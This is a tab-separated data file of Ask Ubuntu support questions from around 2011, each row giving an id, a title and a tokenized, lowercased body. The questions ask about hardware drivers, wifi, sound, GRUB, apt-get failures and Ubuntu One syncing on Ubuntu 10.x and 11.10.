91536	can not adjust brightness on on an lg laptop with an nvidia card	i 'm currently using a lg laptop with nvidia cuda geforce gt 335m . i have difficulty adjusting the screen brightness using fn+arrow up/arrow down . the brightness indicator will appear and the bar will not decrease beyond the first jump . subsequently , if i depress the button , the indicator bar will randomly appear to be dim and bright , with no actual difference to the screen brightness . i have tried to adjust the brightness through system settings > screen . although the bar can be dragged up and down , there seems to be no actual difference in the brightness . furthermore , after installing ubuntu 11.10 , i have difficulty adjusting the brightness in windows 7 as well . the function button does not respond at all , and adjusting it through the control panel does not seems to have any actual difference . what could be the problem ? i have tried to edit the /etc/x11/xorg.conf , and add the line option `` registrydwords '' `` enablebrightnesscontrol=1 '' , but it is not working for me .
91539	no audio from jack on asus pro60v	i recently installed ubuntu 11.10 on a friends old laptop ( asus pro60v ) . everything is running great except i cant get any audio output from the output jack . audio works fine through the internal speakers , but once i plug in speakers or headphones into the jack ( combined spdif & analog ) the internal speakers are muted but there is no output on the external speakers . my guess is it is trying to output through spdif instead of analog ... i tried different outputs settings in the sound setting menu and also looked at alsa mixer , but could n't get it to work . any help would be much apreciated ! kernel : 3.0.0-14-generic asound : advanced linux sound architecture driver version 1.0.24 . codec : == > /proc/asound/card0/codec # 0 < == codec : realtek alc880 == > /proc/asound/card0/codec # 1 < == codec : conexant id 2bfa alsa info here
91543	apt-get update fails to fetch files , “temporary failure resolving …” error	err http : //archive.canonical.com natty inrelease err http : //security.ubuntu.com oneiric-security inrelease err http : //extras.ubuntu.com natty inrelease err http : //security.ubuntu.com oneiric-security release.gpg temporary failure resolving ‘security.ubuntu.com’ err http : //archive.canonical.com natty release.gpg temporary failure resolving ‘archive.canonical.com’ err http : //extras.ubuntu.com natty release.gpg temporary failure resolving ‘extras.ubuntu.com’ err http : //gb.archive.ubuntu.com oneiric inrelease err http : //gb.archive.ubuntu.com oneiric-updates inrelease err http : //gb.archive.ubuntu.com natty-backports inrelease err http : //gb.archive.ubuntu.com oneiric release.gpg temporary failure resolving ‘gb.archive.ubuntu.com’ err http : //gb.archive.ubuntu.com oneiric-updates release.gpg temporary failure resolving ‘gb.archive.ubuntu.com’ err http : //gb.archive.ubuntu.com natty-backports release.gpg temporary failure resolving ‘gb.archive.ubuntu.com’ reading package lists ... done w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/oneiric-updates/inrelease w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/natty-backports/inrelease w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/natty/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/natty/release.gpg temporary failure resolving ‘archive.canonical.com’ w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/oneiric-security/release.gpg temporary failure resolving ‘security.ubuntu.com’ w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/release.gpg temporary failure resolving ‘extras.ubuntu.com’ w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/oneiric/release.gpg temporary failure resolving ‘gb.archive.ubuntu.com’ w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/oneiric-updates/release.gpg temporary failure resolving ‘gb.archive.ubuntu.com’ w : failed to fetch http : //gb.archive.ubuntu.com/ubuntu/dists/natty-backports/release.gpg temporary failure resolving ‘gb.archive.ubuntu.com’ w : some index files failed to download . they have been ignored , or old ones used instead . this is what i 'm seeing when i try to run sudo apt-get update . i did an update on my instance yesterday and am now experiencing this .
91545	do any ubuntu-based distributions ship with unity ?	i like distributions like mint and pinguy because they include most stuff i want to install out of the box . are there any such ubuntu spin-offs that use unity by default ?
91550	starter looses symbol when added to the unity launcher	i have a starter which i would like to add to the launcher . when i move the starter from the dash to the launcher , it will be added but you cant see anything as the symbol of the starter is lost . the empty space that represents the launcher can be used to start the script . any ideas how to keep the symbol ?
91552	how to open amsn that has been minimised to the tray ?	i have problems maximizing apps like amsn which closes into tray when i press the close ( x ) button . in a usual gnome i would call it from the tray , but gnome3 does not have it . so , how should i maximize ( bring to front ) apps in gnome3 that can be restored only via clicking on its tray icon ?
91555	hibernate on power button - login screen	every once in a while my so-user ( significant other user ) leaves the computer but does n't hibernate it . i want to push the power button to save some energy , but as i 'm not in her session , the computer does n't respond . is there a way to configure ubuntu 11.10 to hibernate whenever the power button is pushed ? i already applied this solution , but that only works inside a session .
91556	i need wxpython on ubuntu 11.10 , how do i get it	i have a program that requires wxpython , but the site for wxpython only covers ubuntu upto 11.04 . it requires u to list the name or your distribution in the command for the installation ( ie . 11.04=natty ) . is there any way for me to get wxpython ? i am on a hp with 3 gb of ram and a 2.7 dual core . i am running ubuntu 11.10
91557	ubuntu/lamp - trouble setting up a local test server	what i have done so far : set up lamp on my laptop that runs on ubuntu 11.10. uploaded my websites files in /var/www/ . my problem : when i visit localhost , all i can see is the sites text . it seems the server ca n't locate any of the other folders of the site to display the css and other files . heres some output from firebug : networkerror : 404 not found - http : //localhost/css/ui-lightness/jquery-ui-1.8.11.custom.css networkerror : 404 not found - http : //localhost/js/jquery.js can someone point me into the right direction of how i can fix this issue ?
91566	error after updating from ubuntu 10.04 to ubuntu 10.10	i updated to 10.10 from 10.04 last week . after rebooting it shows `` error `` prefix '' not found '' for half a second and then it 's stuck at a flashing line forever ! ! i installed 10.04 again and i did n't upgrade to 10.10 directly because the flashing line looks creepy and i do n't want to see it again . what should i do now ? ? ps : i want to upgrade to 10.10 i am using wubi i hate that flashing line
91568	how do i install a webcam driver for an hp g62 ?	i have ubuntu 10.10 ( maverick meerkat ) on my hp laptop ( g-62 ) . please guide me on how to install the webcam driver . thanks .
91569	how to choose another drive instead of c : to sync from ?	i use ubuntu one mostly on ubuntu . but at the office i use windows xp . why i can not choose a secodary drive for installing the ubuntu one folder there , and i must install the folder on c : ? i think that it is important to fix that huge error .
91570	sound is n't working in super meat boy ( native 64bit )	i have been having problems getting sound to work in super meat boy from the latest humble indie bundle . no error messages , just no sound . volumes are turned up . this is the 64bit native build , not the windows version running through wine .
91574	usb transfer speeds much slower than windows	i have been exclusively using ubuntu so i had n't previously noticed this but transferring files/folders across usb 2 and 3 is a lot slower on ubuntu . my external drive is exfat , and using usb 3 on windows i get transfer rates of 95 mb/sec and on ubuntu it is only about 20-25 . is there something wrong with my setup or is it that the drivers are n't very good for exfat yet ? i am using fuse-exfat as described in this post : is there a simple way to add exfat support ? thanks for your help
91575	i can only log in as a guest how do i fix this	i have just upgraded to ubuntu 11.10 i had to go into settings i dont know what i have done but now i can only log in as a guest when i boot up i get the message `` ca n't update ice authority file . /home/paul/iceauthority '' also when i try to get into the home folder i get `` you dont have the authority to access this folder . '' what do i do to get into the home folder , i have the passsword but it wont give me permission as a guest but i cant log in as anyone else not even my own name
91578	no sound after installing 11.10	after installing the update to 11.10 the sound on my computer is gone . what happened ? i have a hda intel with a realtek alc1200 chipset . is there a simple solution to this problem . i 'm no computernerd .
91579	how do i diagnose a mount error message during boot ?	i get an error that the system has a problem mounting / and do i want to skip , ignore , etc . i choose ignore and usually everything is ok . i 'm new to linux and ubuntu . this machine will eventually be run headless to boot automatically when power is turned on . how do i diagnose this or work around it ?
91582	how to apply webcam effects to other applications ?	i have a webcam in my laptop . i am user root , so i can do anything . the webcam works fine , everything worked out of the box . i can access it from cheese and apply effects . i can also access the webcam from skype ( as /dev/video0 ) but what i ca n't do , is apply an effect in cheese ( specifically the effect saturation , which produces a much better color quality than the quirky white balance without effects ) and have skype get the video stream with applied effects . is there any way to do that ? as is , i can not run two programs on /dev/video0 simultanously . probably what is needed is retrieving the stream from /dev/video0 , apply the effects , and forward as stream to a virtual device , like /dev/video1 anybody knows how to do that ?
91583	stop ubuntu from displaying text before shutting down	as soon as i press the shutdown button in ubuntu 11.10 it displays text for a few seconds before actually shutting down , its annoying , is there a way to stop it ?
91591	ubuntuone - ca n't sync files	i have signed up for the ubuntu one service today . i have been using ubuntu lucid on my computer for a long time . i just find the ubuntu one storage and sync service recently and i would like to set that for my backups . i have been trying to fix the sync problems since morning . it is afternoon now . i tried to add computer on my account as needed . i had to install client tool first to make that work . now i am not able to add any files to ubuntuone sync . when i try to add file/folder to sync on u1 , it does n't say anything . it does n't start syncing file/folder too . here is the status of my u1sdtool . whatever it is , i am checking whether it is syncing anything when i click on sync options from the folder right click menu choice . sandip @ living-room : ~ $ u1sdtool -- status state : queue_manager connection : with user with network description : processing queues is_connected : true is_error : false is_online : true queues : idle
91593	how can i edit tooltips for unity launcher icons	i want to change the tooltips for some icons in unity launcher . is there any way we can do that ?
91596	will wireless work if i upgrade to 11.10 ?	i have tried 11.10 in the past and the wireless was not fixed . can someone please answer me a simple question and let me know when my acer zg8 will be able to run normally without a ton of command line functions .
91598	how do i login as root ?	i want to login as root , but when i enter sudo -s and enter password , this message is shown : `` you are not in sudoers file '' , and when i enter su and enter password , this is shown : `` authentication failure '' . my os has one account only . about past1 hours ago i log on as root and do some commands , when i logout , i ca n't login another time !
91609	what are the problems between pulseaudio and wine	i have read several problems for a long time about wine and pulseaudio in ubuntu but never understood it clearly . what are the problems or seem to be the problems related to wine and the use by default of pulseaudio in regards to sound in games executed via wine . this affects a whole range of users that use ubuntu but want to still be able to play specific windows games .
91613	why is there a maximum hardware limit of 2048 pixels with multiple monitors	as seen in the image , trying to have the 2 displays side by side creates this problem . there is a 2048x2048 box limit . my question is , what creates this limit and why . what would happen if i try with 3 displays or with 2 huge ones . even better , what would happened if i tried a single monitor at resolutions of 2560x1600 or 2560x2048 . i see that it says `` hardware limit '' . does it mean the limit is made by the video card , all video cards , a specific monitor/tv or all monitors/tvs . this has always crossed my mind many times and since we are almost finished with 2011 ( happy holidays and happy new years to all ) i wanted to kick this doubt out of my mind so if someone else asks i can tell them .
91615	can not boot after hard reset . begin running scripts init-bottom	ok i 'm currently running 11.10 amd64 and i have had to reformat at least 7 times in the last two weeks . any time i have to do a hard reboot ubuntu will no longer boot ( sometimes ) . other times it initially wont want to boot but after a few tries it will . this time it wont boot at all . if i remove quiet splash from grub then i can see the it is locking up at `` begin running scripts init-bottom done '' . part of what is causing this issue is that ubuntu will not shut down properly on my computer , most of the time it will just hang on shutdown or reboot . but in this case i was playing a game in wine and the game froze so i reset . the only thing i have tried is nomodeset . i 'm not sure what to do at this point this is really not good , i had some work i needed to get done today . like i said this is not the first time this has happened either . i have never seen this before , i started dabbling in 8.04 and started using ubuntu full time in 9.10 and this is just perplexing . i have searched for about 2 hours now and i keep finding tons of threads with no solutions . ubuntu 11.10 amd64 ( all up to date ) amd phenom ii x4 955 amd radeon hd 6850 ( using proprietary drivers through jockey , on an older install i used 11.12 but i still had this issue , probably not related ) edit : ok , so i made some progress . i tried booting again , and im in ubuntu now , but i do n't think i have fully fixed the problem ( seeing how i did n't do anything ) at grub i hit e and replaced silent splash with nomodeset this time the boot process continued past where it had stopped before . below is what i got ; fsck from util-linux 2.19.1 /dev/sdb2 : clean , 273336/12091392 files , 4821880/48339968 blocks the disk drive for /media/sdd2 is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery i hit s and booted to my log-in screen . now according to the disk utility `` sdd '' is my flash drive , but i tried booting without it several times before and it made no difference . also `` sdb2 '' is my ubuntu partition , ubuntu occupies an entire 200gb sata `` sdb1 '' is swap , and its 2gb . so i 'm in for now , but i know this issue will come back , it has every time before for the last two weeks .
91622	is there a plain kde version without all the kde applications available for ubuntu ?	i really like kde and ubuntu but i do n't need most of the kde applications , like kontact or kopete that will be installed with the usual kde . is there a way i can install kde ( 4.7 ) without all those applications ? it makes more sense to manually install the ones i actually use ( like konsole ) than uninstalling many .
91628	what is ubuntu global jam ?	i keep seeing the above image here on the ask ubuntu and i 'm curious to know what ubuntu global jam is .
91631	converting contacts for ubuntuone	i run ubuntu 11.10 with thunderbird as main address book ; i also have the thunderbird-couchdb package installed . i know the u1 contacts service status has not been working lately : contacts 2011-11-29 syncing of contacts is not working for some users due to server issues . on 2011-10-10 we released an update to all clients to help ease the load on the server and improve reliability of syncing . we 're now working on finishing up adding additional server hardware . , but i would like to start making my local contact couchdb database ( so my main address book would not be tb one anymore ) , so it could be synced when the service restarts in a stable manner ( and i could access to it from anywhere ) . here is the screenshot of my address books in tb : in details i would like to : understand if and where web address books ( the ones with the globe icon ) are stored in my fylesystem , so i can backup them ; understand which web address book gets synced with u1 ( surely it 's the one named ubuntu one , but i can not get any useful property from tb ) copy ( and not move ) my tb contacts ( the ones with the book icon ) to the couchdb database that will get synced ; copy ( and not move ) my google contacts to the couchdb database that will get synced ; any step-by-step idea ? thanks in advance !
91632	set notification icons to show all in unity-2d	i ca n't get unity-2d to show all notification icons with dconf-editor . it only changes it on unity-3d . is there a way to get it to work on unity 2d ?
91633	usb mouse/lightpen clicks interrupted every 5-10 seconds	i have my wacom volito lightpen connected to usb port and trying to use it with gimp . the problem is that every dozen ( randomly ) of lines it draws exact vertical , horizontal ( randomly again ) lines starting from where cursor is pointing to the edge of screen . its always horizontal , vertical or 45deg lines . i tried to use different usb ports , checked my mouse and stylus on windows ( same laptop ) and everything seems to be working fine . i checked them with blender3d where it simply cancels my selection/action with the same time interval as in gimp . its noticeable with these programs especially ( where i need precision ) but of course it still appears with everyday use , only i noticed it recently while on gimp/blender ; ) to me it seems like some kind of buffer overflow but i have no idea on how to get rid of the problem and i ca n't use my hardware if it occurs . im using lubuntu on oneiric , tried regular ubuntu- same story . any ideas ? to make things absolutely clear- problem not occuring with mouse/lightpen movement , clicks only . i can move my controller freely when it happens . another thing- nothing else is connected to my other usb ports so there shouldnt be any conflicts . i 've plugged usb lamp in as a test and it also works well while mouse/lightpen goes crazy so no usb fault here i guess ...
91634	files do not appear in synchronized folders	i use ubuntu one on ubuntu 11.10 . it seems that files that already exist in a folder that i synchronize are not taken in account , and are not uploaded in the cloud . but , once my folder is synchronized , if i create a file in this folder , it will be correctly uploaded . is there a reason to this ?
91637	installed 32-bit libraries on 64-bit 11.10 and messed everything up	i was trying to get a 32 bit program working on 64-bit 11.10 and followed some stuff i found online that involved installing the 32-bit libraries . i did that and now everything is messed up . none of the applications work anymore except the file browser . is there anyway to fix this ?
91642	how to select grub install device	i apologize in advance for asking a question i suspect is very , very simple . i just got a dedicated server running ubuntu and i 'm using ssh to access it . i ran sudo apt-get dist-upgrade and got the following error message : `` the grub boot loader was previously installed to a disk that is no longer present or whose normally unique indentifier was changed for some reason . it is important to make sure that the installed grub stays in sync with other components such as the grub-cfg or with newer linux images it will have to load , and so you should check again , to make sure that grub is installed to the appropriate boot devices . '' the forum wo n't let me post an image since i 'm a new user , but i uploaded a screenshot of what i 'm seeing here : http : //www.livingtheanswer.org/misc/grub.jpg after a bit of research , i know i need to install to /dev/sda . however , i ca n't figure out how to select that option . i used the arrow keys to highlight it , then pressed enter , but that did n't work . i assume there 's some command which i am not familiar with . can anyone help me out ? again , my apologies for a stupid question ... thanks !
91645	sound only in headphones	i have googled for a solution , but have n't found anything that worked . i have no problem with sound when the headphones are connected . however , i am getting no sound from the laptop speakers . any ideas how to overcome this ? thanks . p.s . i am running ubuntu 11.10 on a asus n82jv
91648	open source ati drivers not working	default ubuntu 10.10 install . system info - > graphics - > driver says `` unknown '' and experiece : 'standard' hardware - > additional drivers : totally empty . windows are moving around sorta slow . lspci | grep vga 01:05.0 vga compatible controller : ati technologies inc rs690m [ radeon x1200 series ] what 's wrong . why does n't additional drivers show propertietary ati driver ? and why is there driver : `` unknown '' can somebody help me to troubleshoot this one ...
91652	basic raw fast read-only file-system ( offering no compression ) for linux ?	i have a situation where i have 2 ( old ) 80 gb harddrives ( yep , pata 133 mb/sec ) on an older via mini-itx board . i am running ubuntu 10.04 lts . the system is installed on the first drive , using ext4 . i am planing to use the second drive for data ( a total of exact 68.2 gb research data distrubuted on 370 individual files ) . i need fast reading access to this data , but once the data is there , i will never need to change it . i am no expert in the implementation of file-systems and drivers for them , but my basic assumption is that there might be something to gain ( in efficiency ) by using a file-system ( as basic as possible ) that only give me the most fundamental reading capabilities of the disk , but as fast as possible . in my scenario , creating the file-system itself , would require access to an original source to copy it from ( another mounted volume ) . importantly , i do not need compression , since my files are already compressed ( zip ) . i could try squashfs and i probably will , but are there other options ? or have i again made things complicated and we are just talking ext2/ext3/ext4 with read-only privileges ? thanks .
91654	removing ppas to proceed with update manager seems risky	after failing to update 11.10 , i found a non-working ppa source , which was some guy 's repository , containing software that i did n't manually install . how do i know the consequences of deactivating this source and most likely , leaving this update at its current state for a long time ? why ca n't update manager just forget about that ppa temporarily and try to update it next time ? is there a way to save time and stop caring about os internal components ?
91656	edimax ew-7811un usb wirless adapter stopped working	after buying an edimax ew-7811un wirless adapter , i managed to get it working on my ubuntu 11.10 system by following the solution described here . this was working great until about a week ago when the adapter suddenly stopped working altogether . this happened after i installed a set of system updates on the 24th of december , so i suspect the updates either altered the driver or affected something the driver depends on . i tried to re-apply the previous solution and found that realtek have since released an update to the driver , so i tried installing this latest version and removed the driver from the modprobe blacklist ( the blacklisting was part of the original solution ) . i was n't able to make the changes to the source code described in the original solution as the relevant code has since moved on and the lines i changed in the last version have now been commented out . this got me to a point where i could connect to a network if i inserted the adapter after i 'd logged into the system ( logging in with the adapter already inserted caused the driver to get stuck in a loop , failing to connect and then re-trying ) , but after a few minutes the connection stopped working ( i could n't reach any other host ) , even though the taskbar widget reported that i was still connected to the wireless network . any suggestions would be greatly appreciated .
91657	blank desktop when logging in via xrdp	i am trying to access ubuntu 11.10 using remote desktop from a win 7 machine . i installed xrdp . i launch the windows remote desktop client and login in . i then get prompted for the user name and password . it then logs in , but all i see is the background , no menus , nothing . i have to kill remote desktop by closing it . even if i right click , nothing . any ideas ? ? ? the only reason i even went down the rdp road was that vnc would not work either , even after i enabled desktop sharing . i am in a bind as i need to connect to ubuntu via windows . in version 8 ubuntu this was not an issue and it just worked .
91661	canon printer on a windows share not working	i have a windows 7 machine with a canon mg5250 connected via usb . it is shared on the network . i have my ubuntu 11.10 machine on the network also , which i want to print from . i got as far as browsing the network , finding the printer , adding it , printing to it and ubuntu reports a successful print . however , the windows print queue spools all the info and reports it as printing even though it does n't print . the windows machine prints with no problems . very odd . any clues as to why this might be happening ? screengrabs at http : //up.k10x.net/nbsekxrdwyytq/windialog.jpg http : //up.k10x.net/uspbajkknkeln/cups.png thanks in advance , lozzy
91663	tcp/ip fingerprinting obfuscator	i 've heard mention that there 's tools for linux that will obscure the `` fingerprint '' your machine provides to snooping parties on the internet -- however i 've been unable to find any mention in the repos or any writeups . can anyone provide any info on a tool to obscure the tcp/ip fingerprint in ubuntu ?
91669	creating a deb package that can be used by lucid , natty and newer versions of ubuntu	i do n't even know if it 's possible . if i need to create separated packages , please explain why .
91671	physical wifi button broken , ubuntu does not show the wifi , can it be bypassed ?	i 'm trying to give an old laptop ( hp pavilion tx 2000z ) to my nephew before he leaves canada to uk tomorrow ( ! ) , but the hardware wireless toggle button is broken . the button simply feels like it 's missing a spring . ubuntu does not show any wifi hardware ( should be a broadcom ) . any tips to look into it , maybe from the command line ? the broadcom ethernet does work . i also installed broadcom 's proprietary driver : bcmwl-kernel-source without any effect . update : ~ $ rfkill list all 0 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : yes ~ $ sudo lshw -class network pci ( sysfs ) thanks a lot !
91673	when installing or booting off of usb pendrive screen goes blank	i was installing ubuntu 11.10 64bit on my new pc from a pendrive , since the only computers i have do not have disk drives , i ran into a problem . after the asus logo when switching on the pc , and pressing f8 to select the usb pen-drive , there was the options thing as normal that allows me to select to either boot form the pen-drive or install on the hdd , when i do either of these , there is a bunch of text on a black background , as i would expect , but after a few seconds the screen goes blank , and the moniter says `` no signal '' . i have previously installed ubuntu with a pen-drive , to fix issues caused my windows , and ran into no problems . is it a problem with the pen drive i am using ? or maybe a problem with the system ? i tried it in my usb 3.0 ports at the back and the usb 2.0 ones aswell . my specs are : amd phenom ii x4 965be asus amd radeon hd 6670 asus m5-l75 usb3 ( typing this form memory , it 's an am3+ asus board with usb3.0 in the amd700 chipet or something ) corsair xms3 ddr3 4gb ( 2x2gb ) 1333mhz ram i ran the memtest program on the pen drive as well , came out clean . thanks for your time :3
91676	how to fix windows bootloader after grub install ?	ok , so that 's what i did : i installed ubuntu and when i had to chose the partitions and grub install i clicked on overwrite `` windows bootloader '' or something like that , now everytime i boot , grub shows ubuntu and windows , ubuntu works but if i choose windows grub send me back to itself . it 's like the windows bootloader loads ... grub . how can i fix that ? parted /dev/sda print model : ata wdc wd3200bevt-7 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 82.3mb 82.2mb primary fat16 diag 2 82.8mb 10.8gb 10.7gb primary ext4 3 10.8gb 317gb 307gb primary ntfs boot 4 317gb 320gb 2683mb extended lba 5 317gb 320gb 2683mb logical linux-swap ( v1 ) windows part of my grub.cfg # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda3 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 7af84223f841de4f chainloader +1 }
91678	notifications go crazy when using dual monitors with an ati radeon	when you configure the system with dual monitor xinerama , everything works fine exept the notification area , goes crazy when i try to raise or lower the volume for example that flashes across the systray appears on both screens . i use : ati radeon hd 5670 , with ubuntu 11.10 x64 clean , not any strange soft or theme , only ati driver configured in dual monitor with xinerama . *note : sorry , for my bad english .
91679	automatic login for wifi hotspot	i am trying to access the internet through a wifi hotspot which requires login details to be entered into a web browser . it keeps disconnecting and requiring me to re-login every few minutes . is there a program for ubuntu which will allow me to automatically login in the background each time this happens ?
91682	i ca n't download from ubuntu software center	after i press install it says : please check your internet connection after i click ok , it says : require installation of untrusted packages , the action would required the installation of packages from not authenticated source
91684	problem with installing ubuntu alongside windows 7	i have my notebook with the preinstalled windows 7 . i 've decided to try ubuntu as well . unfortunately i could n't manage to install it . i was following the guide `` how to dual-boot windows 7 and ubuntu 10.04 . after booting ubuntu from the liveusb and proceeding to the `` allocate drive space '' dialogue box , i 've discovered that the installed windows 7 could n't be identified and there is no item `` install ubuntu alongside windows 7 '' . in this situation i 've chosen `` something else '' item for manual partition allocation . but at the next dialogue box i could n't find any of my 4 partitions . the only item which is visible is `` /dev/sda/ '' . my question , what was wrong ? and what should i do to overcome the stated issue ? p.s . : initially there are was a problem with installation of ubuntu due to the dynamic disk type . using the easeus partition master i 've revert it to basic disk type .
91685	how do i pin a trash bin to the gnome shell activities overview ?	how do i pin a trash bin to the gnome shell activities overview ?
91686	set default wifi network	how do i change the default wifi network that ubuntu connects to on startup ? there is an unsecured public wifi network in my range , as well as my own home wpa secured wifi that i want to use by default . however , on startup ubuntu always connects to the unsecured one . sometimes i forget to reconnect to the other one , which is very dangerous . i am running a default setup of ubuntu destkop 11.10 with gnome 3 . i have looked under network settings but i ca n't find a 'default ' option .
91687	in oem installations can we edit final-user applications setting ?	in oem installations can we edit final-user applications setting with the oem-user to change the final user settings ? if possible how can i do ?
91690	laptop webcam is not detected , does n't show up in lsusb	i 'm weirded out . i have an acer aspire 5515 series laptop which has a webcam built in . when i open cheese , it says : `` no device found '' . camorama says : `` could not connect to video device . please check connection '' . neither lspci nor lsusb contain any records that can be a webcam . it 's almost like there is no webcam in the system at all . ~ $ lspci 00:00.0 host bridge : ati technologies inc rs690 host bridge 00:01.0 pci bridge : ati technologies inc rs690 pci to pci bridge ( internal gfx ) 00:06.0 pci bridge : ati technologies inc rs690 pci to pci bridge ( pci express port 2 ) 00:07.0 pci bridge : ati technologies inc rs690 pci to pci bridge ( pci express port 3 ) 00:12.0 sata controller : ati technologies inc sb600 non-raid-5 sata 00:13.0 usb controller : ati technologies inc sb600 usb ( ohci0 ) 00:13.1 usb controller : ati technologies inc sb600 usb ( ohci1 ) 00:13.4 usb controller : ati technologies inc sb600 usb ( ohci4 ) 00:13.5 usb controller : ati technologies inc sb600 usb controller ( ehci ) 00:14.0 smbus : ati technologies inc sbx00 smbus controller ( rev 14 ) 00:14.1 ide interface : ati technologies inc sb600 ide 00:14.2 audio device : ati technologies inc sbx00 azalia ( intel hda ) 00:14.3 isa bridge : ati technologies inc sb600 pci to lpc bridge 00:14.4 pci bridge : ati technologies inc sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : ati technologies inc rs690m [ radeon x1200 series ] 02:00.0 ethernet controller : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 046d : c045 logitech , inc. optical mouse help . p.s . : well , i 'm beginning to think that the webcam is simply physically broken . i see no other explanation for it not to show up in lsusb .
91693	how do you uninstall ruby 1.8.7 and install ruby 1.9.2 ?	does anyone know how to properly uninstall ruby 1.8.7 and install ruby 1.9.2 on ubuntu 11.10 ? i have thoroughly searched and none of the tutorials i 've found have worked . also , i spent a very long time trying to get rvm to work and it just is a pain to use . additionally , i will have little use for the older version . update outputs : which ruby : /usr/local/bin/ruby ls -l /usr/local/bin/ruby : lrwxrwxrwx 1 root root 16 2011-10-17 21:20 /usr/local/bin/ruby - > /usr/bin/ruby1.8 ls -l /etc/alternatives/ruby : lrwxrwxrwx 1 root root 18 2011-12-30 17:35 /etc/alternatives/ruby - > /usr/bin/ruby1.9.1 echo $ path : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games by the way , when i look at -- config gem , it tells me that there is only one gem , which is /usr/bin/gem1.9.1
91696	cron.weekly does not run	i have a shellscript in /etc/myprog/myscript.sh that i would like to run every week . therefore i created a symbolic link in /etc/cron.weekly : root @ ip-10-190-199-197 : /etc/cron.weekly # ls -ltr total 8 -rwxr-xr-x 1 root root 895 2011-07-27 11:32 man-db -rwxr-xr-x 1 root root 730 2011-09-24 14:55 apt-xapian-index lrwxrwxrwx 1 root root 31 2011-11-17 05:36 myscript - > /etc/myprog/myscript.sh to test it , i did : cd /etc/cron.weekly sudo ./myscript it works perfect . however , the cronjob never actually runs for some reason . do i need to do anything to activate cron.weekly ? the contents of my /etc/myprog/myscript.sh is : cd /var/log/myprog/ /etc/myprog/updatescript.sh 1 > `date '+/etc/myprog/logs/ % y- % m- % d-cran.log'` 2 > `date '+/etc/myprog/logs/ % y- % m- % d-cran-warnings.log'`
91698	wireless is disabled by hardware switch on lenovo z470	my friend has been running ubuntu 11.10 for quite some time . everything had been working fine . the laptop shut down because of battery and when rebooted , the wireless lan has n't been working with a message `` wireless is disabled by hardware switch '' . he has checked that the hardware switch is indeed on . the output of rfkill list is as follows : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no he even tried rfkill unblock all but rfkill list still showed hard blocked : yes for phy0 : wireless lan . following is the description of wireless interface returned by lshw : *-network disabled description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : wlan1 version : 00 serial : 74 : e5:0b:0c:39:0e width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-14-generic-pae firmware=128.50.3.1 build 13488 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:42 memory : e8100000-e8101fff just for the info , my friend does n't have windows on his machine .
91701	how to set vlc as default video player ?	ca n't seem to set vlc as the default video player . i have gone to system settings - > system info - > default applications , and changed `` video '' to vlc media player . however , all movies still open with movie player ( totem ) by default . the video default application setting appears to have no effect . i have tried changing the setting and logging out/rebooting , it does n't appear to work . is there some command line magic i can work on this ?
91703	can i download and burn an ubuntu cd for the mac on a windows pc ?	i have a mac g4 with a corrupted operating system . i do n't want to reload os x again , but want to try ubuntu on it . if i download the current release of ubuntu on a windows machine and burn the iso , will that load on the mac ?
91707	key ( s ) to change layout	i get used to the following combination to change keyboard layouts : ctrl + shift + 7 change to english ctrl + shift + 8 change to russian ctrl + shift + 9 change to chinese how to do it with ubuntu 11.10 ?
91713	why are n't my animated .gif images animated ?	os version : ubuntu 11.10 x64 browser tested : firefox - not working nightly - not working google chrome - not working midori - works currently , i 'm using 64 bit version of ubuntu and i 've installed a few web browsers . almost all of them does not display an animation of the .gif file but instead it freezes like any other static images . however , midori works instead . is there any fixes ?
